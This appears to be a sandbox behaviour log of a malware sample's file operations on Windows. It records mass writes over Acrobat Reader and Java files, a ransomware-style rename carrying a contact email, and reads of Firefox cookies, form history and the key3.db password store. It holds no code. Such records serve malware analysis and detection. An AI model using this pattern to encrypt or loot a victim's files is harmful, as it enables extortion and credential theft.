| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\desktop.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\PlayStore_icon.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\PlayStore_icon.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Sign_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Sign_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\plugin-selectors.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Move | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\[InkognitoMan@tutamail.com].qIx7BCAj-C8oTdWDe.NOBAD | source_filename = C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 61440, size_out = 61440 |
|
17 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db | size = 4096, size_out = 4096 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 5512 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\desktop.ini | size = 1590 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | size = 8998 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | size = 2839 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\classlist | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\classlist | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | size = 5016 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | size = 5512 |
|
1 | |
